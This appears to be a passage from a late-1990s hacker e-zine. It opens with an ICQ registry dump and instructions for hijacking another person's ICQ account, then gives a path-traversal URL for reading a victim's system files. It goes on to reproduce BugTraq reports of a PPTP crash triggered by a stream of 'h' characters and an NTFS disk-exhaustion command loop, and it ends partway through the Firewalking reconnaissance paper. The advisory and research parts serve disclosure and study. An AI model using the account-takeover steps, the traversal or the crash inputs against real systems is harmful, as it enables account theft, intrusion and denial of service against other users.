00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "Novice"="No" "Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00 "State Flags"=dword:00000000 "Server Msg Version"=dword:0000000b "Server Msg Shown"=dword:00000001 "Server Msg Count"=dword:00000009 "LeftButton Warning"="No" "Menu Left Click"="No" "Tip Startup"="No" "Tip Position"=dword:00000000 "MoreEvents Warning"="No" "Invisible Warning"="No" "Send Later Warning Off"="No" "Busy Warning"="No" "Away Warning"="No" "DND Warning"="No" "FT Warning"="No" "Ext Warning"="No" "Out Warning"="No" "Chat Warning"="No" "Away Message"="User is currently away\r\nYou can leave him/her a message" "Random Comment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-1998. No Rights Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth." [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets] "OutMsg Presets 0"="I'm out'a here. See you tomorrow!" "DNDMsg Presets 0"="Please do not disturb me now. Disturb me later." "Away PresetsMsg 0"="Away" "Out PresetsMsg 0"="Out for the day" "Busy PresetsMsg 0"="Busy" "DND PresetsMsg 0"="DND" "Chat PresetsMsg 0"="Chat" "AwayMsg Presets 1"="I am out to lunch. I will return shortly." "OutMsg Presets 1"="" "DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed." "ChatMsg Presets 1"="Come Join my chat room!" "Away PresetsMsg 1"="Lunch" "Out PresetsMsg 1"="Not here" "Busy PresetsMsg 1"="Meeting" "DND PresetsMsg 1"="Meeting" "Chat PresetsMsg 1"="Come In" "AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!" "OutMsg Presets 2"="I'm closed for the weekend/holidays." "DNDMsg Presets 2"="Don't disturb my concentration!" "ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!" "Away PresetsMsg 2"="Be right back" "Out PresetsMsg 2"="Closed" "Busy PresetsMsg 2"="Concentration" "DND PresetsMsg 2"="Concentration" "Chat PresetsMsg 2"="Fun" "AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished." "OutMsg Presets 3"="Gone fishin'." "DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!" "ChatMsg Presets 3"="What are you waiting for? Come on in!" "Away PresetsMsg 3"="Dog Walk" "Out PresetsMsg 3"="Fishing" "Busy PresetsMsg 3"="On the Phone" "DND PresetsMsg 3"="On the Phone" "Chat PresetsMsg 3"="Don't Wait" "AwayMsg Presets 4"="Went out for a smoke. " "OutMsg Presets 4"="I'm sleeping. Don't wake me." "DNDMsg Presets 4"="I can't chat with you now. I'm busy." "ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat." "Away PresetsMsg 4"="Smoke" "Out PresetsMsg 4"="Sleeping" "Busy PresetsMsg 4"="Can't chat " "DND PresetsMsg 4"="Can't chat " "Chat PresetsMsg 4"="Hear" "AwayMsg Presets 5"="On my Coffee break." "OutMsg Presets 5"="Went home. Had to feed the kids." "DNDMsg Presets 5"="Can't you see I'm working?" "ChatMsg Presets 5"="Enter your chat room message here" "Away PresetsMsg 5"="Coffee" "Out PresetsMsg 5"="Kids" "Busy PresetsMsg 5"="Working" "DND PresetsMsg 5"="Working" "Chat PresetsMsg 5"="Empty" "AwayMsg Presets 6"="Went to get some fresh air." "OutMsg Presets 6"="Gone for good." "DNDMsg Presets 6"="Enter your occupied message here" "ChatMsg Presets 6"="Enter your chat room message here" "Away PresetsMsg 6"="Air" "Out PresetsMsg 6"="Gone" "Busy PresetsMsg 6"="Conversing" "DND PresetsMsg 6"="Empty" "Chat PresetsMsg 6"="Empty" "BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered." "DNDMsg Presets 7"="Enter your occupied message here" "ChatMsg Presets 7"="Enter your chat room message here" "Away PresetsMsg 7"="Empty" "Out PresetsMsg 7"="Empty" "Busy PresetsMsg 7"="Empty" "DND PresetsMsg 7"="Empty" "Chat PresetsMsg 7"="Empty" "BusyMsg Presets 0"="User is currently Occupied" "ChatMsg Presets 0"="I would like to chat about anything" "BusyMsg Presets 1"="User is currently Occupied1" "BusyMsg Presets 2"="User is currently Occupied2" "BusyMsg Presets 3"="User is currently Occupied" "BusyMsg Presets 4"="User is currently Occupied" "BusyMsg Presets 5"="User is currently Occupied" "BusyMsg Presets 6"="User is currently Occupied" "AwayMsg Presets 7"="User is currently away" "OutMsg Presets 7"="User is currently N/A" "AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0] "Message"="Please bookmark our network status page." "URLName"="http://www.mirabilis.com/status.html" "URL"="press here" "Date"="" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1] "URLName"="http://www.mirabilis.com/emailsig.html" "URL"="Go to the ICQ e-mail signature generator" "Date"="" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2] "Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group - home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )" "URLName"="http://www.icq.com/announcements/02.html" "URL"="It's fun and easy, GO!!" "Date"="31-MAR-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3] "URLName"="http://www.icq.com/announcements/whitepages.html" "URL"="Go!" "Date"="1-APR-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4] "Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!" "URLName"="http://www.mirabilis.com/email.html" "URL"="E-mail notification instructions" "Date"="15-JUN-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5] "URLName"="http://www.icq.com/announcements/05.html" "URL"="Create your Greeting" "Date"="12-JUL-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="26-AUG-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7] "Message"="ICQ can alert you when you receive Emails and show you the Email headers!" "URLName"="http://www.icq.com/announcements/07.html" "URL"="Learn how to do it" "Date"="06-SEPT-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="20-OCT-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup1] "Name"="General Chat" "Number"=dword:00000001 "Version"=dword:00000001 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup2] "Name"="Romance" "Number"=dword:00000002 "Version"=dword:00000002 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup3] "Name"="Games" "Number"=dword:00000003 "Version"=dword:00000003 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup4] "Name"="Students" "Number"=dword:00000004 "Version"=dword:00000004 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup5] "Name"="20 Something" "Number"=dword:00000006 "Version"=dword:00000006 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup6] "Name"="30 Something" "Number"=dword:00000007 "Version"=dword:00000007 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup7] "Name"="40 Something" "Number"=dword:00000008 "Version"=dword:00000008 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup8] "Name"="50 Plus" "Number"=dword:00000009 "Version"=dword:00000009 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1] "Host"="icq1.mirabilis.com" "Port"=dword:00000fa0 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canasta] "Type"="Command" "Command Line"="/ip:" "Path"="C:\\Program Files\\Canasta\\Canasta.exe" "URL"="http://ourworld.compuserve.com/homepages/mharte" "Version"=dword:0000000f [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Connectix VideoPhone] "Type"="Extension" "Format"="/p:tcp /ac:" "Extension"="cvp" "URL"="http://www.connectix.com/html/videophone.html" "Version"=dword:00000009 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Seeme] "Type"="Command" "Command Line"="" "Path"="C:\\CUSEEME\\CUSEEM32.EXE" "URL"="http://www.cu-seeme.com/" "Version"=dword:00000006 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone] "Type"="Extension" "Format"="" "Extension"="iru" "URL"="http://irisphone.com/" "Version"=dword:0000000a [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat] "Type"="ServerExtension" "Format"="1.1\\n-u 1 -a " "Extension"="vce" "NumParameters"=dword:00000002 "Server1"="vchat1.microsoft.com" "URL"="http://vchat1.microsoft.com" "Version"=dword:00000011 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param1] "ParamName"="World" "CanOtherChange"="No" "Param1"="#Compass" "Param2"="#BugWorld" "Param3"="#Fishbowl" "Param4"="#Lodge" "Param5"="#Lunar" "Param6"="#Lodge" "Param7"="#Practice" "Param8"="#RedDen" "Param9"="#TableTop" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param2] "ParamName"="Avatar" "CanOtherChange"="Yes" "Param1"="Amani" "Param2"="Anderson" "Param3"="Brb" "Param4"="Cat" "Param5"="Crab" "Param6"="Dancer" "Param7"="Dred" "Param8"="Duggan" "Param9"="Joey" "Param10"="Lulu" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netscape CoolTalk] "Type"="Command" "Command Line"="" "Path"="C:\\Program Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE" "URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.html" "Version"=dword:00000004 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikken on the Rockx] "Type"="ClientServer" "Client Command Line"="/CLIENT %i" "Server Command Line"="/SERVER" "Client Path"="C:\\Rikken\\Rikken.exe" "Server Path"="C:\\Rikken\\Rikken.exe" "URL"="http://www.dse.nl/~ramon/rikken/" "Version"=dword:00000017 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPhone] "Type"="Extension" "Format"="callto://" "Extension"="vdp" "URL"="http://www.vdo.net/download/" "Version"=dword:00000003 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCall] "Type"="Command" "Command Line"="" "Path"="C:\\VidCall\\Corp.EXE" "URL"="http://www.access.digex.net/~vidcall/vidcall.html" "Version"=dword:00000008 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPhone] "Type"="Extension" "Format"="" "Extension"="wpc" "URL"="http://www.webphone.com/" "Version"=dword:00000007 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake] "Type"="ClientServer" "Client Command Line"="-mpath +connect %i" "Server Command Line"="-mpath -listen" "Client Path"="c:\\quake_sw\\Q95.bat" "Server Path"="c:\\quake_sw\\Q95.bat" "Server1"="quake.xmisson.com" "URL"="http://www.idsoftware.com" "Version"=dword:00000010 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat] "Type"="ServerCommand" "Format"="GROUPNAME=i PORT=15000" "Path"="C:\\Program Files\\VoxChat\\VoxChat.exe" "NumParameters"=dword:00000001 "Server1"="voxchat1.voxware.com" "Server2"="voxcha2.voxware.com" "URL"="http://www.voxchat.com/low/download.htm" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat\Param1] "ParamName"="Room" "CanOtherChange"="No" "Param1"="#ICQ" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations] "LastUpdate"=dword:00000000 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main] "SelectedCell"=dword:00000000 "AlwaysOnTop"="Yes" "LeftBarWidth"=dword:000000ad "RightBarWidth"=dword:000000ad "FloatBar-Left"=dword:00000255 "FloatBar-Right"=dword:00000307 "FloatBar-Top"=dword:00000033 "FloatBar-Bottom"=dword:000001f3 "State"="Floating" "Minimized"="No" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows] "Response"=dword:008f00c9 "SearchWiz"=dword:006f00c0 "NotifyWiz"=dword:006f00c0 "posNovice"=dword:009300dc "posMOTD"=dword:00af00b7 "posMenuConfig"=dword:00a900e7 "RemoveUIN"=dword:00bb0108 "Message"=dword:008b004f "Security"=dword:007400b4 "Prefs"=dword:007f00ae "History"=dword:0096003a "File Request"=dword:009000f0 "FileTransfer"=dword:009700ae "Info"=dword:009300d2 "FetchUser"=dword:00e9010e "URL Message"=dword:00a00069 "Away"=dword:00bd00f7 "Chat Request"=dword:009f00dd "Contacts List"=dword:008300bd "Chat"=dword:008b00f5 "Phone"=dword:000a000a "Phone Call Request"=dword:007700e5 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search] "Place"=dword:00a400cc "Type"=dword:00000002 "Width"=dword:01880188 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat] "ChatStyle Counter"=dword:00000003 "Pen Color"=dword:0080ffff "Back Color"=dword:00004000 "Send Focus"="Yes" "Enable Sounds"="Yes" "Name Bars"="Yes" "Always On Top"="No" "AutoColor"="No" "OverRide Format"="Yes" "Show Toolbar"="Yes" "State"=dword:00010000 "New Font Name"="Times New Roman" "Char Set"=dword:00000000 "IRCListWidth"=dword:00000006 "Font Pitch"=dword:00000012 "New Font Height"=dword:0000000e "Font Effects"=dword:00000000 "AutoColor 0"=dword:00000000 "AutoColor 1"=dword:00000080 "AutoColor 2"=dword:00008000 "AutoColor 3"=dword:00008080 "AutoColor 4"=dword:00800000 "AutoColor 5"=dword:00800080 "AutoColor 6"=dword:00808000 "AutoColor 7"=dword:00808080 "AutoColor 8"=dword:00c0c0c0 "AutoColor 9"=dword:000000ff "AutoColor 10"=dword:0000ff00 "AutoColor 11"=dword:0000ffff "AutoColor 12"=dword:00ff0000 "AutoColor 13"=dword:00ff00ff "AutoColor 14"=dword:00ffff00 "AutoColor 15"=dword:00ffffff "Place-Left"=dword:0000000a "Place-Right"=dword:000001fe "Place-Top"=dword:0000000a "Place-Bottom"=dword:0000021a "New LogFile name"="ICQChatLog.txt" "New SaveFile name"="ICQChatSave.txt" 4. Save the file as HACKEDICQ.REG 5. If you have ICQ open, close it. 6. Copy all the files you got earlier (the idx and dat files) into your ICQ\DB directory ex: c:\progra~1\ICQ\db 7. Open the HACKEDICQ.REG file 8. When it asks if you would like to add this to your registry, click YES. 9. Open the DB convert program in your ICQ directory (It comes with ICQ99), then click on "Convert a old DB" 10. When it's done converting, close the DB converter. It should start ICQ automatically, but if it doesn't, open it manually. 11. If ICQ doesn't already start in the Hacked UIN, click on the ICQ menu, click on "Add/Change Current User", then click on "Change the Active User". Choose Hacked UIN. If it asks for the password, there's 2 things that may have happened: I. They have the protection set on high. The only way of getting past the protection is to download the ICQ CRACK. II. They are sill online. The only thing you can do is wait until they go offline. 12. Once you are successfully in the users ICQ, quickly change the users password. Once this is complete, you will be in total control over the users ICQ account. Mission success. ICQ Exploit Tips ----------------- Remember in the last text I wrote? I told you to download the command.com. There's a better way to find out the Windows version, and more info with it, too. Get the file http://123.123.123.123/.html/......../msdos.sys. I saw in the original ICQ Exploit text that the HTTP server Exploit doesn't work on NT, so i went in NT and i tested it. The result was system wasn't exploitable. Hence, if you are running NT, and you want to use the HTTP server; it's 100% safe for you to do so. Shadow51 29000000 Shadow51@hackcity.com @HWA 13.0 Possible DoS in WinNT RAS (PPTP) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Possible DOS in WinNT RAS (PPTP) Simon Helson (simon@CONCEPTS.CO.NZ) Tue, 27 Apr 1999 09:29:06 -0700 Please excuse if this has been posted before, I did a quick search of the archives and found nothing This hasn't been sent to MS, as I don't know an email address to send it to, Aleph, if you find it worthy of sending, please forward a copy to the MS people for their attention. Cheers. I was playing around with PPTP last night, and discovered that, with "very" minimal effort, I could cause my friends NT Server (version 4, service pack 4) to reboot instantly, without shutting down. All I did was telnet to the port (1723) on the NT box, and then send the following data. hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhh (that's 256 'h's for those who don't want to count :-) and hit return. nothing. BUT, then I hit ^D and all hell broke loose. The NT server dropped like a stone, full hardware reboot. I tested this multiple times and always got the same response. The NT Server was version 4, with Service pack 4 applied. Cheers Simon ------------------------------------------------------------------------------ Date: Tue, 27 Apr 1999 20:55:50 -0700 From: Simon Helson To: BUGTRAQ@netspace.org Subject: RE Possible DOS in WinNT RAS (PPTP) Hello again. please excuse the lack of detail in my first posting. I was trying to recollect the events of the past evening. Unfortunately I don't have unlimited access to a NT server to play with. However, I have tried this again (on the same server) this time over the internet as opposed to a LAN. (trying to remove the NIC from the equation.) Firstly, the NT setup: NT Server Version 4, with Service Pack 4.0 applied. (outside US version - only 40 bit) PPTP added as a network device Number of VPNs available - 2 then RAS service started. The attack box setup: RedHat Linux 5.2 running kernel 2.2.1 modem connection to the net The procedure I followed: [root@blobby /root]# telnet 1723 Trying ... Connected to . Escape character is '^]' hhhhhhhhhhhhhhh ^d (not shown in output) ^] telnet> close Connection closed. The instant I hit ^d his server rebooted. AFAIK there is nothing special in the setup of the NT server. I hope this clears up the picture. Cheers Simon ------------------------------------------------------------------------------ Date: Tue, 27 Apr 1999 10:55:52 -0700 From: Aleph One To: BUGTRAQ@netspace.org Subject: Re: Possible DOS in WinNT RAS (PPTP) Summary of this thread. Didn't work: NT 4.0 SP4, RRAS - Chris Alliey NT 4.0 Server SP3, 128-bit, no RAS - Russ NT 4.0 Server SP3, PPTP3-fix, no RAS 128-bit - Russ NT 4.0 Server SP4, 128-bit, no RAS - Russ NT 4.0 Server SP4 - Lewman, Andrew NT 4.0 Server Enterprise, SP4 - Lewman, Andrew Yes: NT 4.0 SP4, Option Pack - Huang Min NT 4.0 Server, SP4, 40-bit, RAS - Simon Helson Hardware or device driver error, or maybe an issue with RAS but not RRAS? -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 @HWA 14.0 MFT problem could cause you to have to reformat your drive (NTFS) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 27 Apr 1999 18:26:54 +0400 From: Vladimir Dubrovin To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: MFT problem Hello NTBUGTRAQ, Sorry for my bad English... Some times ago it was noticed the problem with MFT. I don't know if this problem was discussed in this list, so if it is - just discard this message. The problem is: Then creating a very large number of empty files on NTFS partition and then removing this files you loose a lot of space (up to 90% of volume!) and you couldn't recover this space without reformatting the NTFS volume. This problem occurs because NT allocates space in MFT (Master File Table, an internal NTFS database). Then the MFT reserved space ends NT allocates new space for MFT. The space allocated for MFT will never be released. (information "How NTFS Reserves Space for its Master File Table (MFT)" can be found in KB article Q174619). Then creating empty file (with zero length) it takes disk space olny in directory entry and MFT table. If you'll fill your NTFS volume with such files and then delete them the MFT table will take the most of your hard drive space (up to 90% as it was noticed before). You can reproduce this problem next way: It's better to use empty NTFS volume of small size - 50-100Mb - the results will be more distinctive. Check the free space on your NTFS volume. md temp for /L %i in (1,1,1000000) do type nul >temp/file.%i.tmp then you fill all the partition with this files - abort the circle. del /Q temp\*.* del /Q temp Now you can check free space on your hard drive. You've loosed it almost completely... By the way: it seems dir /A $MFT doesn't shows real MFT size, as it described in Microsoft documentation. At least you will never find the space you've loosed in any special file. But you can try some other utility, such as defragmentation utilities - usually they shows MFT reserved space... The problem is, that any user, who has "create" permition in any directory on NTFS volume can bring this volume down. It's specially interesting if your FTP server has "incoming" directory, or you offer free HTML pages for your customers on NTFS volume... This problem isn't solvable with some kind of disk quotas, because the files are empty... I've contacted Vitaly Savenkov from Russian department of Microsoft, russia@microsoft.com. He forwarded me reply from developers: <><><><><><><> Dear ..., I'm sorry that I have to tell you the following. - My investigations and the answers from our Secondary Response Group confirmed, that the $MFT will never shrink. The only way is to reformat the Partition. This behavior is the drawback resulting from optimizing the NTFS performance. The main goal was to avoid fragmentation. - Possibly the best resolution for your situation is to use a single partition for the FTP Data. If the available space then goes under an acceptable level you can backup this partition and reformat it. I checked this with our Escallation Team and so i can say that this behavior of NTFS will not be changed. best regards, ... <><><><><><><> So, now you can check it... +=-=-=-=-=-=-=-=-=+ |Vladimir Dubrovin| | CSS Coordinator | | Sandy Info, ISP | =+=-=-=-=-=-=-=-=-=+=-= @HWA 15.0 Firewalking, a paper to determine gateway access control lists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm Security http://www.genocide2600.com/~tattooman/unix-audit/firewalk/ ------------------------------------------------------------------------------------ Firewalking A Traceroute-Like Analysis of IP Packet Responses to Determine Gateway Access Control Lists Cambridge Technology Partners' Enterprise Security Services David Goldsmith Senior Security Architect dhg@es2.net Michael Schiffman Senior Security Architect mds@es2.net October 1998 Contents of this document are Copyright (c) 1998 Cambridge Technology Partners Enterprise Security Services, Inc. Distribution is unlimited under the condition that due credit is given and no fee is charged. ESS is a division of Cambridge Technology Partners, Inc. TABLE OF CONTENTS i. Terminology ii. A note about examples I. Introduction II. Traceroute III. Information gathering using traceroute IV. Firewalking V. Firewalk - The tool VI Risk Mitigation i. Terminology ACL Access Control List. A set of rules that enforce a security policy. In the scope of this paper, an Access Control List will solely apply to network policy. Router/Gateway Used interchangeably. In the scope of this report, they refer to a multi-homed host that is configured to forward IP datagrams. It may or may not have a packet filtering ACL in place that denies some network traffic. Ingress traffic Describes network traffic that originates from the outside of a network perimeter and progresses towards the inside. Egress traffic Describes network traffic that originates from the inside of a network perimeter and progresses towards the outside. Firewall Refers to a multi-homed host configured to forward IP datagrams which uses a packet filtering ACL to control network traffic. ii. A note about examples There are several sample traceroute dumps used in this report. The astute reader will note that the IP addresses are RFC 1918[1] compliant non-routable internal network addresses. The empirical data and traceroute dumps are taken directly from live Inte rnet hosts1, and in order to protect their identity, we have changed the addresses to anonymize the machines and networks involved. iii. A note about diagrams There are none in this ASCII version. For the real deal, check out one of the grapical formats from http://www.es2.net/research/firewalk. I. Introduction This paper describes Firewalking, a technique that can be used to gather information about a remote network protected by a firewall. The purpose of the paper is to examine the risks that this technique represents. This paper is intended for a technical audience with an advanced understanding of network infrastructure and TCP/IP packet structures. Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. More over, it can determine whether packets with various control information can pass through a given gateway. Also, using this technique, an attacker can map routers behind a packet-filtering device. To fully understand how this technique works, we first need to understand how traceroute works. This paper provides an introduction to traceroute. II. Traceroute Traceroute [1] is a network debugging utility designed to map out all hosts en route to a particular destination. Traceroute works by sending UDP or ICMP echo (ping)2 packets to a destination host and monotonically increasing the time to live (TTL) field in the IP header each successive round (by default, a round consists of three packets or probes). If the traceroute scan is done using UDP the destination port will be incremented with each probe sent. The IP TTL field is used to limit the lifetime of datagrams across the Internet and is decremented just before a router forwards a packet. If this reduction would cause the TTL to be 0 or less, the router in question will send back an ICMP error message (time to live exceeded in transit) to the original host. This lets the original host know at which router the packet expired. By starting the TTL at one, routers between two given hosts can be found by increasing the TTL and monitoring the ICMP responses (provided there isn't any prohibitive filtering or any severe packet loss). To ensure that it gets a proper response from the ultimate destination host (an ICMP port unreachable or an ICMP echo reply) traceroute will either pick a high UDP port that is unlikely to be used by any application or use ping packets. III. Information gathering using traceroute With an understanding of how traceroute works, we can now explore how this can this be used to leverage information about a particular network. This section will demonstrate two different ways of using traceroute to do some network reconnaissance. These following examples are contrived to show specific situations that may or may not be commonplace. - Protocol subterfuge The first scenario involves a network protected by a firewall that is blocking all ingress traffic except for ping and ping responses (ICMP types 8 and 0 respectively). We can use the stock traceroute program to show us what hosts are behind this filter (which is presumably against the security policy). Instead of the default behavior of using UDP (Figure 1), we want to force traceroute to use ICMP packets (Figure 2). Notice that this time we are able to view hosts behind the firewall. zuul:~>traceroute 10.0.0.10 traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets 1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms 2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms 3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms 4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms 5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms 6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms 7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms 8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms 9 * * * 10 * * * Figure 1 zuul:~>traceroute -I 10.0.0.10 traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets 1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms 2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms 3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms 4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms 5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms 6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms 7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms 8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms 9 10.0.0.9 (10.0.0.9) 94.127 ms 81.764 ms 96.476 ms 10 10.0.0.10 (10.0.0.10) 96.012 ms 98.224 ms 99.312 ms Figure 2 - Nascent port seeding The second scenario involves a more common example of a network protected by a firewall which blocks all ingress traffic except for UDP port 53 (Domain Name Service or DNS). zuul:~>traceroute 10.0.0.10 traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets 1 10.0.0.1 (10.0.0.1) 0.540 ms 0.394 ms 0.397 ms 2 10.0.0.2 (10.0.0.2) 2.455 ms 2.479 ms 2.512 ms 3 10.0.0.3 (10.0.0.3) 4.812 ms 4.780 ms 4.747 ms 4 10.0.0.4 (10.0.0.4) 5.010 ms 4.903 ms 4.980 ms 5 10.0.0.5 (10.0.0.5) 5.520 ms 5.809 ms 6.061 ms 6 10.0.0.6 (10.0.0.6) 9.584 ms 21.754 ms 20.530 ms 7 10.0.0.7 (10.0.0.7) 89.889 ms 79.719 ms 85.918 ms 8 10.0.0.8 (10.0.0.8) 92.605 ms 80.361 ms 94.336 ms 9 * * * 10 * * * Figure 3 As you can see from figure 3, the traceroute scan is blocked at the 8th hop because no traffic is allowed entrance into the network except for DNS queries. Armed with this knowledge, we can easily map hosts behind the gateway. We can control the following: * The starting source port of the traceroute (which, by default, increases monotonically as each probe is sent). * The number of probes sent each round (by default this is 3). We can determine the following: * The number of hops in between our attacking host and the target firewall. This information allows us to deterministically control the port number of the probe that will reach the firewall. Due to the 